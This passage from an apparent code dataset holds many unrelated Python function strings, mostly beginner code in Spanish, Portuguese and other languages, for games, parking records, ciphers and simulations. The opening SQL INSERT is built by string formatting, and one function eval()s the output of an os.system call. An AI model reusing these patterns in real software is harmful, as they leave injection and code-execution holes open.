LOGIN, TURMA) VALUES (NULL, '%s', '%s', '%s', %s);\" %(dados, situacao, login, turma))\r\n return True\r\n except:\r\n return False", "def Inicio():\n menu = \"\"\"\n Bienvenido al conversor de monedas 💰\n\n 1 - Pesos colombianos\n 2 - Pesos argentinos\n 3 - Pesos mexicanos\n\n Elige una opción: \"\"\"\n\n opcion = int(input(menu))\n \n if opcion == 1:\n moneda = 'pesos colombianos'\n elif opcion == 2:\n moneda = 'pesos argentinos'\n elif opcion == 3:\n moneda = 'pesos mexicanos'\n else:\n print(f'La opción no es valida')\n\n if opcion == 1 or opcion == 2 or opcion == 3 :\n cambio = conversor(moneda)\n print(f'La cantidad de {cambio[1]} {moneda} en dólares es de {cambio[0]} USD')", "def cauto(self):\n return self[\"cauto\"]", "def letalidade(self):\n self.covidbr['letalidade'] = self.covidbr['obitosAcumulado'] / self.covidbr['casosAcumulado']", "def add_car(matricula, posicio, color, marca):\n global max\n con = lite.connect('parking.db')\n cur = con.cursor()\n if(_formatMatriculaValid(matricula)):\n if(max!=0):\n try:\n 
cur.execute(\"INSERT INTO cotxes(id_cotxe, color, marca) values (?,?,?);\", (matricula, color, marca))\n cur.execute(\"INSERT INTO parking(id_cotxe, placa, entrada) values (?,?, DATETIME('now'));\",(matricula, posicio))\n con.commit()\n max -=1\n except lite.IntegrityError:\n print \"Error.\"\n else:\n print\"Parking ple. El cotxe\",matricula,\"no ha pogut entrar.\"\n else:\n print(\"Format matricula invalid.\")\n con.close()", "def colocar_especial(tablero_juego, filas, columnas, especiales_nivel, datos_de_especiales, obstaculos, posicion_fruta, posicion_serpiente):\n color_normal = '\\033[0m'\n color_azul = '\\033[34m'\n especial_colocado = choice(especiales_nivel)\n especial = datos_de_especiales[especial_colocado]\n while True:\n posicion_especial = [randint(0, filas-1), randint(0, columnas-1)]\n if not any((esta_contenido_o_igual(posicion_especial, obstaculos), \n esta_contenido_o_igual(posicion_especial, posicion_serpiente), \n esta_contenido_o_igual(posicion_especial, posicion_fruta))): break\n tablero_juego[posicion_especial[0]][posicion_especial[1]] = color_azul + especial_colocado + color_normal\n return posicion_especial, especial_colocado", "def gerarPalavraSecreta():\n global palavraOculta\n for _ in range(len(palavraDoJogo)):\n palavraOculta += '*'\n print(palavraOculta)", "def genera_vacios(lista_anidada):\n lista_vacios = [ ]\n letras = [\"A\",\"B\",\"C\",\"D\",\"E\",\"F\",\"G\",\"H\",\"I\",\"J\"]\n\n for n, x in enumerate(lista_anidada):\n for i, y in enumerate(x):\n if y == \"0\":\n fila = letras[n]\n lugar = str(i+1)\n estacionamiento = fila,lugar\n lista_vacios.append(\"\".join(estacionamiento))\n return lista_vacios", "def emOrdem(self, x):\n if x is not None:\n self.emOrdem(x.getEsquerdo())\n print(x.getChave(), end = ' ')\n self.emOrdem(x.getDireito())", "def primera_palabra_mayuscula(cadena):\n palabras = cadena.split(\" \")\n frase_final = \"\"\n for palabra in palabras: # recorro la palabra separada \n frase_final += palabra.capitalize() + \" \" # agarro la palabra separado y la primera letra la pongo en mayuscula \n return frase_final", "def crearIndices(self):\n l = self.encontrarCaracteres()\n i=0\n for c in l:\n self.indices[c] = i\n i+=1", "def avanzar(self, distancia):\n avance = Vector( math.cos(self.orientacion) * distancia, math.sin(self.orientacion) * distancia )\n self.posicion = self.posicion + avance", "def cauto(self):\n return self['cauto']", "def palabras_iniciales(cadena, letra):\n palabras = cadena.split(\" \")\n palabras_iniciales = \" \"\n for i in palabras:\n if i[0] == letra.lower() or i[0] == letra.upper(): # comparo la primera letra con la letra si es mayuscula o minuscula\n palabras_iniciales += i + \" \" # pongo las palabras acorde a la letra pre-seleccionada\n if palabras_iniciales == \" \":\n print(\"No hay:\", letra, \" en:\", cadena)\n\n return palabras_iniciales", "def colocar_palabra(matrix, palabra, esfila, pos, inicio) :\n for x in range(inicio, inicio+len(palabra) ) :\n if esfila:\n matrix[pos][x] = palabra[x-inicio]\n else:\n matrix[x][pos] = palabra[x-inicio]\n return matrix", "def __init__(self, nombre, cantidad, precio):\n\n # Atributos privados por convensión\n self._an = 15 # Ancho de columna nombre\n self._ac = 8 # Ancho de columna cantidad\n self._ap = 10 # Ancho de columna precio\n self._ast = 10 # Ancho de columna subtotal\n\n # Se inicializan los atributos de la instancia\n self.nombre = nombre\n self.cantidad = cantidad\n self.precio = precio", "def cadena_palabras_con_a(cadena):\n lista=cadena.split(\" \")\n total = 
\"\"\n for palabra in lista:\n if palabra.startswith(\"a\") or palabra.startswith(\"A\"):\n total += palabra + \" \"\n return total", "def calcular_ocupacion():\n\tcur.execute(\"\"\"\n\t\t\t\tSELECT COUNT(*)\n\t\t\t\tFROM sansanito\n\t\t\t\tWHERE legendary=0\"\"\")\n\tnormales = cur.fetchall()\n\tcur.execute(\"\"\"\n\t\t\t\tSELECT COUNT(*)\n\t\t\t\tFROM sansanito\n\t\t\t\tWHERE legendary=1\"\"\")\n\tlegendarios = cur.fetchall()\n\t# Calcula la ocupacion como cant_normales * 1 + cant_legendarios * 5\n\tocupado = normales[0][0] + 5 * legendarios[0][0]\n\treturn ocupado", "def acao(self, propriedade):\n if not super(Aleatorio, self).acao(propriedade):\n # Se atende criterio aleatorio\n if random.random() > PROBABILIDADE_DE_COMPRA:\n propriedade.compra(self)", "def afficher(self):\n bordRect = (self.pos[0]-5, self.pos[1]-5, self.dim[0]+5, self.dim[1]+5)\n Fond = pygame.draw.rect(self.ecran.surface, self.ecran.couleur, bordRect, 0) # Efface le precedant text\n\n rang = 0\n verif = \"\"\n compteur = 0\n self.lignes = []\n if self.txt == \"\": self.txt = \" \"\n \n while verif != self.txt:\n verif =\"\"\n rang += self.correction(self.txt[rang:], compteur)\n compteur += 1\n for k in self.lignes:\n verif += k.txt\n\n for compteur in range(len(self.lignes)):\n self.lignes[compteur].afficher()\n\n self.dim = (self.dim[0], self.hLigne*(compteur+1)) # +1 -> Boucle for\n \n pygame.display.flip()", "def change(coor):\n return chr(coor[0] + 65), coor[1] + 1", "def muestraLado(v1, v2, posicionInicial):\n\tvertices = [v1, v2]\n\tlados = [(0, 1)]\n\tcaras = []\n\tmeshLado = bpy.data.meshes.new(\"lado\")\n\tobjLado = bpy.data.objects.new(\"lado\", meshLado)\n\n\t# coloco el objeto lado en la misma posicion que el cursor\n\tobjLado.location = posicionInicial\n\n\t# enlazo el objeto lado a la escena\n\tbpy.context.scene.objects.link(objLado)\n\n\t# creo la maya del objeto lado\n\tmeshLado.from_pydata(vertices,lados,caras)\n\tmeshLado.update(calc_edges=True)\n\n\treturn objLado", "def opcion1_automatica(v):\n v_range = len(v)\n\n for i in range(v_range):\n tit = ('Harry Potter', 'Percy Jackson', 'El Principito', 'Cien años de soledad',\n 'El señor de los anillos', 'Un mundo feliz', 'Orgullo y prejuicio',\n 'Crimen y castigo', 'Lolita', 'Ulises', 'El gran Gatsby', 'Mil soles espléndidos',\n 'Alicia en el país de las maravillas', 'Rebelión en la granja', 'Los pilares de la tierra',\n 'Guerra y paz', 'Memorias de una geisha', 'Frankenstein', 'Los viajes de Gulliver', 'La ladrona de libros')\n\n gen = ('Autoayuda', 'Arte', 'Ficción', 'Computación', 'Economía',\n 'Escolar', 'Sociedad', 'Gastronomía', 'Infantil', 'Otros')\n\n lang_list = ('Español', 'Inglés', 'Francés', 'Italiano', 'Otros')\n titulo = random.choice(tit)\n genero = random.choice(gen)\n isbn = auto_gen_isbn()\n idioma = random.choice(lang_list)\n precio = round(random.uniform(0, 2000), 2)\n v[i] = Libro(isbn, titulo, genero, idioma, precio)\n\n print()\n print('\\t\\tVECTOR CARGADO')\n print()", "def intenta_adelantar_camion_manipuleo(self, sistema, operacion, medio_de_almacenamiento):\r\n\r\n entre_primeros_cola_m_a = \\\r\n self.entre_primeros_cola_medio_de_almacenamiento(medio_de_almacenamiento)\r\n\r\n entre_primeros_cola_r_a = \\\r\n self.entre_primeros_cola_recurso(operacion.recurso)\r\n\r\n # El camion verifica si puede adelantar algun camion por detras en la cola del\r\n # medio de almacenamiento que disponga producto/espacio y este por detras en la\r\n # cola del recurso de atención\r\n if entre_primeros_cola_m_a and entre_primeros_cola_r_a and 
\\\r\n any(c.dispone_producto_espacio_medio_almacenamiento(medio_de_almacenamiento) and\r\n c.atras_de_camion_en_cola_recurso(self, operacion.recurso)\r\n for c in medio_de_almacenamiento.cola_detras_de_camion(self)):\r\n c_adelantado = [ca for ca in medio_de_almacenamiento.cola_detras_de_camion(self)\r\n if ca.dispone_producto_espacio_medios_almacenamiento(sistema) and\r\n ca.atras_de_camion_en_cola_recurso(self, operacion.recurso)][0]\r\n\r\n self.adelanta_camion(sistema, operacion, medio_de_almacenamiento, c_adelantado, \"Almacen\")\r\n\r\n # El camion verifica si puede adelantar algun camion por detras en la cola del\r\n # medio de almacenamiento que disponga producto/espacio y este entre los primeros\r\n # en alguna cola de recursos de atención\r\n if entre_primeros_cola_m_a and \\\r\n any(c.dispone_producto_espacio_medio_almacenamiento(medio_de_almacenamiento) and\r\n c.entre_primeros_colas_recursos(sistema.recursos_atencion)\r\n for c in medio_de_almacenamiento.cola_detras_de_camion(self)):\r\n c_adelantado = [ca for ca in medio_de_almacenamiento.cola_detras_de_camion(self)\r\n if ca.dispone_producto_espacio_medios_almacenamiento(sistema) and\r\n ca.entre_primeros_colas_recursos(sistema.recursos_atencion)][0]\r\n\r\n self.adelanta_camion(sistema, operacion, medio_de_almacenamiento, c_adelantado, \"Almacen\")\r\n\r\n # El camion verifica si puede adelantar algun camion por detras en la cola del\r\n # recurso de atención que disponga producto/espacio y este entre los primeros\r\n # en alguna cola de medios de almacenamiento\r\n if entre_primeros_cola_r_a and \\\r\n any(c.dispone_producto_espacio_y_entre_primeros_medios_almacenamiento(sistema) # TODO rev. posib. bugs\r\n for c in operacion.recurso.cola_detras_de_camion(self)):\r\n c_adelantado = [ca for ca in operacion.recurso.cola_detras_de_camion(self)\r\n if ca.dispone_producto_espacio_medios_almacenamiento(sistema) and\r\n ca.entre_primeros_colas_medios_almacenamiento(sistema)][0]\r\n\r\n self.adelanta_camion(sistema, operacion, medio_de_almacenamiento, c_adelantado, \"Operacion\")", "def coste_de_aplicar_accion(self, estado, accion):\n return 1", "def __init__(self, nombre, cantidad, precio, marca, modelo):\n\n # Se ejecuta el constructor de la clase padre\n super().__init__(nombre, cantidad, precio)\n\n # Se modifica el valor de un atributo privado\n self._an = 25\n\n # Se inicializan los atributos de la clase hija\n self.marca = marca\n self.modelo = modelo", "def cargar_otras(self):\n\n stream_cargar = open ('yo_otros.txt', 'rt',encoding=\"utf-8\")\n datos=stream_cargar.readlines()\n \n # print(datos)\n # print (len(kasino.maquinas))\n\n lista_maquinas=[]\n lista_deco =[]\n day=\"\"\n money=\"\"\n\n contador=0\n dia_o_dinero=\"dia\"\n\n for i in datos[0]:\n # print(contador,i)\n if contador <8:\n lista_maquinas.append(i)\n contador+=1\n\n elif contador <17:\n lista_deco.append(i)\n contador+=1\n\n\n elif contador >= 17 and dia_o_dinero ==\"dia\":\n if i ==\"D\":\n pass\n elif i ==\"M\":\n dia_o_dinero=\"dinero\"\n else:\n day+=i\n elif contador >= 17 and dia_o_dinero == \"dinero\":\n money+=i\n \n \n\n # print(\"lm\",lista_maquinas)\n # print (\"ld\",lista_deco)\n # print(day,money)\n\n contador=0\n for i in kasino.maquinas:\n kasino.maquinas[i]=int(lista_maquinas[contador])\n contador+=1\n\n contador=0\n for i in kasino.decoracion:\n kasino.decoracion[i]=int(lista_deco[contador])\n contador+=1\n\n kasino.dia=int( day)\n kasino.dinero=int(money)", "def translate_to_algebraic(location):\n\n columns = 'abcdefghi'\n return 
columns[location[0]] + str(location[1] + 1)", "def Es_adyacente(self,coordenada:list) -> bool:\n\n\t\tx=coordenada[0] # FILA\n\t\ty=coordenada[1] # COLUMNA\n\n\t\t#Busqueda en el interior del tablero\n\t\tif x<5 and x>0 and y<5 and y>0 :\n\t\t\tif self.tablero[x+1][y]!=0:\n\t\t\t\treturn True\n\t\t\telif self.tablero[x-1][y]!=0:\n\t\t\t\treturn True\n\t\t\telif self.tablero[x+1][y+1]!=0:\n\t\t\t\treturn True\n\t\t\telif self.tablero[x-1][y-1]!=0:\n\t\t\t\treturn True\n\t\t\telif self.tablero[x+1][y-1]!=0:\n\t\t\t\treturn True\n\t\t\telif self.tablero[x-1][y+1]!=0:\n\t\t\t\treturn True\n\t\t\telif self.tablero[x][y+1]!=0:\n\t\t\t\treturn True\n\t\t\telif self.tablero[x][y-1]!=0:\n\t\t\t\treturn True\n\t\t\telse:\n\t\t\t\treturn False\n\n\t\t#Busqueda en los bordes del tablero\n\t\tif x==5 and y>0 and y<5 :\n\t\t\tif self.tablero[x-1][y]!=0:\n\t\t\t\treturn True\n\t\t\telif self.tablero[x-1][y-1]!=0:\n\t\t\t\treturn True\n\t\t\telif self.tablero[x-1][y+1]!=0:\n\t\t\t\treturn True\n\t\t\telif self.tablero[x][y+1]!=0:\n\t\t\t\treturn True\n\t\t\telif self.tablero[x][y-1]!=0:\n\t\t\t\treturn True\n\t\t\telse:\n\t\t\t\treturn False\n\t\tif x==0 and y>0 and y<5:\n\t\t\tif self.tablero[x+1][y]!=0:\n\t\t\t\treturn True\n\t\t\telif self.tablero[x+1][y+1]!=0:\n\t\t\t\treturn True\n\t\t\telif self.tablero[x+1][y-1]!=0:\n\t\t\t\treturn True\n\t\t\telif self.tablero[x][y+1]!=0:\n\t\t\t\treturn True\n\t\t\telif self.tablero[x][y-1]!=0:\n\t\t\t\treturn True\n\t\t\telse:\n\t\t\t\treturn False\n\t\tif y==5 and x<5 and x>0:\n\t\t\tif self.tablero[x+1][y]!=0:\n\t\t\t\treturn True\n\t\t\telif self.tablero[x-1][y]!=0:\n\t\t\t\treturn True\n\t\t\telif self.tablero[x-1][y-1]!=0:\n\t\t\t\treturn True\n\t\t\telif self.tablero[x+1][y-1]!=0:\n\t\t\t\treturn True\n\t\t\telif self.tablero[x][y-1]!=0:\n\t\t\t\treturn True\n\t\t\telse:\n\t\t\t\treturn False\n\t\tif y==0 and x<5 and x>0:\n\t\t\tif self.tablero[x+1][y]!=0:\n\t\t\t\treturn True\n\t\t\telif self.tablero[x-1][y]!=0:\n\t\t\t\treturn True\n\t\t\telif self.tablero[x+1][y+1]!=0:\n\t\t\t\treturn True\n\t\t\telif self.tablero[x-1][y+1]!=0:\n\t\t\t\treturn True\n\t\t\telif self.tablero[x][y+1]!=0:\n\t\t\t\treturn True\n\t\t\telse:\n\t\t\t\treturn False\n\n\t\t#busqueda en las esquinas del tablero\n\t\tif x==0 and y==0:\n\t\t\tif self.tablero[x+1][y]!=0:\n\t\t\t\treturn True\n\t\t\telif self.tablero[x+1][y+1]!=0:\n\t\t\t\treturn True\n\t\t\telif self.tablero[x][y+1]!=0:\n\t\t\t\treturn True\n\t\t\telse:\n\t\t\t\treturn False\n\t\tif x==0 and y==5:\n\t\t\tif self.tablero[x+1][y]!=0:\n\t\t\t\treturn True\n\t\t\telif self.tablero[x+1][y-1]!=0:\n\t\t\t\treturn True\n\t\t\telif self.tablero[x][y-1]!=0:\n\t\t\t\treturn True\n\t\t\telse:\n\t\t\t\treturn False\n\t\tif x==5 and y==0:\n\t\t\tif self.tablero[x-1][y]!=0:\n\t\t\t\treturn True\n\t\t\telif self.tablero[x-1][y+1]!=0:\n\t\t\t\treturn True\n\t\t\telif self.tablero[x][y+1]!=0:\n\t\t\t\treturn True\n\t\t\telse:\n\t\t\t\treturn False\n\t\tif x==5 and y==5:\n\t\t\tif self.tablero[x-1][y]!=0:\n\t\t\t\treturn True\n\t\t\telif self.tablero[x-1][y-1]!=0:\n\t\t\t\treturn True\n\t\t\telif self.tablero[x][y-1]!=0:\n\t\t\t\treturn True\n\t\t\telse:\n\t\t\t\treturn False", "def vigenere(phrase, clef, operation):\n sortie, i = \"\", 0\n for caract in phrase: #parcours de la chaine a traiter\n if operation == \"1\": #chiffrement\n sortie = sortie + chr((ord(caract) + ord(clef[i])) % 256)\n i = i + 1 #parcours de la cle\n if i > len(clef) - 1:\n i = 0 #fin de cle atteinte, on repart au debut\n elif operation == \"2\": 
#dechiffrement\n sortie = sortie + chr((ord(caract) - ord(clef[i])) % 256)\n i = i + 1\n if i > len(clef) - 1:\n i = 0\n return sortie", "def update_cola(self):\n self.listUsuarioAtentiendo.append(self.listUsuario[0])\n self.listUsuario.pop(0)\n self.cola -= 1", "def inicializar_tablero(self):\n\n cont_pixels_x = 0 # Para contar los pixeles en x, y tenerlos como referencia en la casilla correspondiente\n cont_pixels_y = 0 # Para contar los pixeles en y, y tenerlos como referencia en la casilla correspondiente\n pixels_cuadro = 100\n\n for f in range(len(self._matriz)): # Inicializando la matriz del tablero que va a contener los objetos casilla\n cont_pixels_y += pixels_cuadro\n for c in range(len(self._matriz[f])):\n cont_pixels_x += pixels_cuadro\n\n # Por el momento solo se estara utilizando una ficha para pruebas.\n if f == 0 and c == 1: #(superior_izq, superior_der, inferior_izq, inferior_der )\n self._matriz[f][c] = Casilla (Ficha('f_marron.png'), (f, c), (cont_pixels_x - pixels_cuadro, cont_pixels_x, cont_pixels_y - pixels_cuadro, cont_pixels_y))\n\n else:\n self._matriz[f][c] = Casilla(None, (f, c), (cont_pixels_x - pixels_cuadro, cont_pixels_x, cont_pixels_y - pixels_cuadro, cont_pixels_y))\n\n cont_pixels_x = 0 # Bajar la columna\n\n\n return self._matriz", "def soma(conexao, valores):\n try:\n return '{0}'.format(float(valores[1]) + float(valores[2]))\n except:\n return 'ERRO'", "def CL(self):", "def area_cuadrado(lado):\n area = lado**2\n print \"El area es: \",area", "def pyramida(zakladna, orientacia, centrovanie):\n nova_pyramida = []\n if orientacia not in [\"normalna\", 'obratena']:\n print(\"Pyramida moze byt iba [normalna] alebo [obratena]\")\n return False\n\n if centrovanie != \"center\" and centrovanie != \"vlavo\":\n print(\"Centrovanie pyramidy moze byt iba [center] alebo [vlavo]\")\n return False\n\n if centrovanie == \"center\":\n if orientacia == \"normalna\":\n\n cislo_riadka = -1\n for i in range(1, zakladna + 1, 2): #pocet hviezdiciek rastie po 2\n #print(f\"{'*' * i:^{zakladna}}\")\n cislo_riadka +=1\n riadok = []\n for j in range(cislo_riadka,zakladna//2): #vyska pyramidy = polovica zakladne\n riadok.append(\" \") #kolky riadok, tolko medzier vlavo\n for j in range(0, i):\n riadok.append(\"*\")\n for j in range(cislo_riadka,zakladna//2): # aj v pravo\n riadok.append(\" \")\n nova_pyramida.append(riadok)\n else:\n cislo_riadka = -1\n for i in range(zakladna, 0, -2): #pocet hviezdiciek\n #print(f\"{'*' * i:^{zakladna}}\")\n cislo_riadka +=1\n riadok = []\n for j in range(0,cislo_riadka):\n riadok.append(\" \")\n for j in range(0,i):\n riadok.append(\"*\")\n for j in range(0,cislo_riadka):\n riadok.append(\" \")\n nova_pyramida.append(riadok)\n else:\n if orientacia == \"normalna\":\n for i in range(zakladna):\n #print(f\"{'*' * (i + 1)}\")\n riadok = []\n for j in range(0,i):\n riadok.append(\"*\")\n nova_pyramida.append(riadok)\n else:\n for i in range(zakladna):\n riadok = []\n #print(f\"{'*' * (zakladna - i)}\")\n for j in range(zakladna, i, -1):\n riadok.append(\"*\")\n nova_pyramida.append(riadok)\n return nova_pyramida", "def ConUACalc(self):\n if hasattr(self,\"con\"): return self.con\n st = self.uacalc_format(\"A\"+str(self.index))\n writefile('tmpalgCon.ua',st)\n os.system('java -classpath '+clspth+'uacalc/classes/ org.uacalc.example.ConUACalc tmpalgCon.ua >tmpoutCon.txt')\n st = readfile('tmpoutCon.txt')\n st = st[st.index(\"[\"):] # remove diagnostic output\n self.con = eval(st)\n return self.con", "def combinar(memoria):\n\n antLibre = False\n 
antEspacio = 0\n\n for part in memoria[:]:\n if antLibre and part[1] == None:\n part[0] += antEspacio\n del memoria[memoria.index(part) - 1]\n\n if part[1] == None:\n antLibre = True\n else:\n antLibre = False\n\n antEspacio = part[0]\n\n return memoria", "def accueil():\r\n global etat\r\n background(0,128,128)\r\n image(tireur,0,0) \r\n rectMode(CORNERS)\r\n fill(100)\r\n rect(0,60,250,120)\r\n rect(500,60,750,120)\r\n fill(0)\r\n textSize(30)\r\n text(\"PVP\",95,100) \r\n text(\"ORDINATEUR\",520,100) \r\n if (mousePressed) and mouseX<250 and mouseX>0 and mouseY<120 and mouseY>60: #si on clique sur le rectangle jouer\r\n etat=1 #on passe en mode jeu\r\n if (mousePressed) and mouseX<750 and mouseX>500 and mouseY<120 and mouseY>60: \r\n etat=2", "def solicita_adelanto_operacion(self, sistema, operacion, medio_de_almacenamiento=None):\r\n\r\n primeros_cola_r_a = operacion.recurso.cola[0:operacion.recurso.capacity]\r\n primeros_cola_r_a_disponen_p_e_s_o_manip =\\\r\n all(camion.dispone_producto_espacio_sistema(sistema) or camion.manipulado.triggered\r\n for camion in primeros_cola_r_a)\r\n\r\n if operacion.recurso.nombre == \"Balanza 2\":\r\n pass\r\n elif operacion.nombre == \"Primer pesaje - B3\":\r\n operacion.recurso.cola[operacion.recurso.count].adelanta_camion(\r\n sistema, operacion, medio_de_almacenamiento, self, \"Operacion\")\r\n elif (self.dispone_producto_espacio_sistema(sistema) or self.manipulado.triggered) \\\r\n and not primeros_cola_r_a_disponen_p_e_s_o_manip:\r\n primeros_cola_r_a[operacion.recurso.count].adelanta_camion(\r\n sistema, operacion, medio_de_almacenamiento, self, \"Operacion\")", "def initialize_bolsa(self,nivel):", "def es_satisfecho_por(self, candidata):", "def ir(self):\n if not self._chamados:\n self._andar = 0\n else:\n super().ir() # metodo irado de falar q ta usando function base.", "def entrada(self, linha, coluna):\n matriz = [[ 0 for x in range(coluna) ] for y in range (linha)]\n vetor_linha = [0, 1, 0, -1]\n vetor_coluna = [1, 0, -1, 0]\n l = 0\n c = 0\n direcao = 0\n for n in range(linha * coluna):\n matriz[l][c] = n + 1\n if ((vetor_coluna[direcao] == 1 and c == coluna - 1) or \n (vetor_linha[direcao] == 1 and l == linha - 1) or\n (vetor_coluna[direcao] == -1 and c == 0) or\n (matriz[l + vetor_linha[direcao]][c + vetor_coluna[direcao]] != 0)):\n direcao = (direcao + 1) % 4\n l += vetor_linha[direcao]\n c += vetor_coluna[direcao]\n return matriz", "def leerUltrasonido() -> int:\n pass", "def Permite_salto(self,coordenada:list,color:int) -> bool:\n\n\t\t#coordenadas\n\t\tfila = coordenada[0]\n\t\tcolumna = coordenada[1]\n\n\t\t#lista de direciones en las que se podia saltar\n\t\tkey=[False]*8\n\n\t\t#La coordenada en donde se desea posicionar la ficha debe ser adyacente a alguna ficha ya puesta\n\t\tif self.Es_adyacente(coordenada):\n\n\t\t\t#Por cada direccion se analiza si permite el salto\n\n\t\t\t#abajo\n\t\t\taux = columna+1\n\t\t\tif aux<5 and aux>0:\n\t\t\t\tif color==1:\n\t\t\t\t\tif self.tablero[fila][aux]==2:\n\t\t\t\t\t\tfor i in range(5-aux):\n\t\t\t\t\t\t\tif self.tablero[fila][aux+i+1]==1:\n\t\t\t\t\t\t\t\tif not self.generando_jugadas:\n\t\t\t\t\t\t\t\t\tself.Convertir([fila,aux],[fila,aux+i+1],\"derecha\",1)\n\t\t\t\t\t\t\t\tkey[0]=True\n\t\t\t\tif color==2:\n\t\t\t\t\tif self.tablero[fila][aux]==1:\n\t\t\t\t\t\tfor i in range(5-aux):\n\t\t\t\t\t\t\tif self.tablero[fila][aux+i+1]==2:\n\t\t\t\t\t\t\t\tif not 
self.generando_jugadas:\n\t\t\t\t\t\t\t\t\tself.Convertir([fila,aux],[fila,aux+i+1],\"derecha\",2)\n\t\t\t\t\t\t\t\tkey[0]=True\n\t\t\t#arriba\n\t\t\taux = columna-1\n\t\t\tif aux<5 and aux>0:\n\t\t\t\tif color==1:\n\t\t\t\t\tif self.tablero[fila][aux]==2:\n\t\t\t\t\t\tfor i in range(aux):\n\t\t\t\t\t\t\tif self.tablero[fila][aux-i-1]==1:\n\t\t\t\t\t\t\t\tif not self.generando_jugadas:\n\t\t\t\t\t\t\t\t\tself.Convertir([fila,aux],[fila,aux-i-1],\"izquierda\",1)\n\t\t\t\t\t\t\t\tkey[1]=True\n\t\t\t\tif color==2:\n\t\t\t\t\tif self.tablero[fila][aux]==1:\n\t\t\t\t\t\tfor i in range(aux):\n\t\t\t\t\t\t\tif self.tablero[fila][aux-i-1]==2:\n\t\t\t\t\t\t\t\tif not self.generando_jugadas:\n\t\t\t\t\t\t\t\t\tself.Convertir([fila,aux],[fila,aux-i-1],\"izquierda\",2)\n\t\t\t\t\t\t\t\tkey[1]=True\n\t\t\t#derecha\n\t\t\taux = fila+1\n\t\t\tif aux<5 and aux>0:\n\t\t\t\tif color==1:\n\t\t\t\t\tif self.tablero[aux][columna]==2:\n\t\t\t\t\t\tfor i in range(5-aux):\n\t\t\t\t\t\t\tif self.tablero[aux+i+1][columna]==1:\n\t\t\t\t\t\t\t\tif not self.generando_jugadas:\n\t\t\t\t\t\t\t\t\tself.Convertir([fila,columna],[aux+i+1,columna],\"abajo\",1)\n\t\t\t\t\t\t\t\tkey[2]=True\n\t\t\t\tif color==2:\n\t\t\t\t\tif self.tablero[aux][columna]==1:\n\t\t\t\t\t\tfor i in range(5-aux):\n\t\t\t\t\t\t\tif self.tablero[aux+i+1][columna]==2:\n\t\t\t\t\t\t\t\tif not self.generando_jugadas:\n\t\t\t\t\t\t\t\t\tself.Convertir([fila,columna],[aux+i+1,columna],\"abajo\",2)\n\t\t\t\t\t\t\t\tkey[2]=True\n\t\t\t#izquierda\n\t\t\taux = fila-1\n\t\t\tif aux<5 and aux>0:\n\t\t\t\tif color==1:\n\t\t\t\t\tif self.tablero[aux][columna]==2:\n\t\t\t\t\t\tfor i in range(aux):\n\t\t\t\t\t\t\tif self.tablero[aux-i-1][columna]==1:\n\t\t\t\t\t\t\t\tif not self.generando_jugadas:\n\t\t\t\t\t\t\t\t\tself.Convertir([fila,columna],[aux-i-1,columna],\"arriba\",1)\n\t\t\t\t\t\t\t\tkey[3]=True\n\t\t\t\tif color==2:\n\t\t\t\t\tif self.tablero[aux][columna]==1:\n\t\t\t\t\t\tfor i in range(aux):\n\t\t\t\t\t\t\tif self.tablero[aux-i-1][columna]==2:\n\t\t\t\t\t\t\t\tif not self.generando_jugadas:\n\t\t\t\t\t\t\t\t\tself.Convertir([fila,columna],[aux-i-1,columna],\"arriba\",2)\n\t\t\t\t\t\t\t\tkey[3]=True\n\t\t\t#abajo-izquerda\n\t\t\taux = fila-1\n\t\t\taux2 = columna+1\n\t\t\tif aux<5 and aux>0 and aux2<5 and aux2>0:\n\t\t\t\tpar = [aux,5-aux2]\n\t\t\t\tif color==1:\n\t\t\t\t\trango = min(par)\n\t\t\t\t\tif self.tablero[aux][aux2]==2:\n\t\t\t\t\t\tfor i in range(rango):\n\t\t\t\t\t\t\tif self.tablero[aux-i-1][aux2+i+1]==1:\n\t\t\t\t\t\t\t\tif not self.generando_jugadas:\n\t\t\t\t\t\t\t\t\tself.Convertir([fila,columna],[aux-i-1,aux2+i+1],\"arriba-derecha\",1)\n\t\t\t\t\t\t\t\tkey[4]=True\n\t\t\t\tif color==2:\n\t\t\t\t\trango = min(par)\n\t\t\t\t\tif self.tablero[aux][aux2]==1:\n\t\t\t\t\t\tfor i in range(rango):\n\t\t\t\t\t\t\tif self.tablero[aux-i-1][aux2+i+1]==2:\n\t\t\t\t\t\t\t\tif not self.generando_jugadas:\n\t\t\t\t\t\t\t\t\tself.Convertir([fila,columna],[aux-i-1,aux2+i+1],\"arriba-derecha\",2)\n\t\t\t\t\t\t\t\tkey[4]=True\n\n\t\t\t#arriba-izquierda\n\t\t\taux = fila-1\n\t\t\taux2 = columna-1\n\t\t\tif aux<5 and aux>0 and aux2<5 and aux2>0:\n\t\t\t\tpar = [aux,aux2]\n\t\t\t\tif color==1:\n\t\t\t\t\trango = min(par)\n\t\t\t\t\tif self.tablero[aux][aux2]==2:\n\t\t\t\t\t\tfor i in range(rango):\n\t\t\t\t\t\t\tif self.tablero[aux-i-1][aux2-i-1]==1:\n\t\t\t\t\t\t\t\tif not self.generando_jugadas:\n\t\t\t\t\t\t\t\t\tself.Convertir([fila,columna],[aux-i-1,aux2-i-1],\"arriba-izquierda\",1)\n\t\t\t\t\t\t\t\tkey[5]=True\n\t\t\t\tif color==2:\n\t\t\t\t\trango = 
min(par)\n\t\t\t\t\tif self.tablero[aux][aux2]==1:\n\t\t\t\t\t\tfor i in range(rango):\n\t\t\t\t\t\t\tif self.tablero[aux-i-1][aux2-i-1]==2:\n\t\t\t\t\t\t\t\tif not self.generando_jugadas:\n\t\t\t\t\t\t\t\t\tself.Convertir([fila,columna],[aux-i-1,aux2-i-1],\"arriba-izquierda\",2)\n\t\t\t\t\t\t\t\tkey[5]=True\n\t\t\t#abajo-derecha\n\t\t\taux = fila+1\n\t\t\taux2 = columna+1\n\t\t\tif aux<5 and aux>0 and aux2<5 and aux2>0:\n\t\t\t\tpar = [5-aux,5-aux2]\n\t\t\t\tif color==1:\n\t\t\t\t\trango = min(par)\n\t\t\t\t\tif self.tablero[aux][aux2]==2:\n\t\t\t\t\t\tfor i in range(rango):\n\t\t\t\t\t\t\tif self.tablero[aux+i+1][aux2+i+1]==1:\n\t\t\t\t\t\t\t\tif not self.generando_jugadas:\n\t\t\t\t\t\t\t\t\tself.Convertir([fila,columna],[aux+i+1,aux2+i+1],\"abajo-derecha\",1)\n\t\t\t\t\t\t\t\tkey[6]=True\n\t\t\t\tif color==2:\n\t\t\t\t\trango = min(par)\n\t\t\t\t\tif self.tablero[aux][aux2]==1:\n\t\t\t\t\t\tfor i in range(rango):\n\t\t\t\t\t\t\tif self.tablero[aux+i+1][aux2+i+1]==2:\n\t\t\t\t\t\t\t\tif not 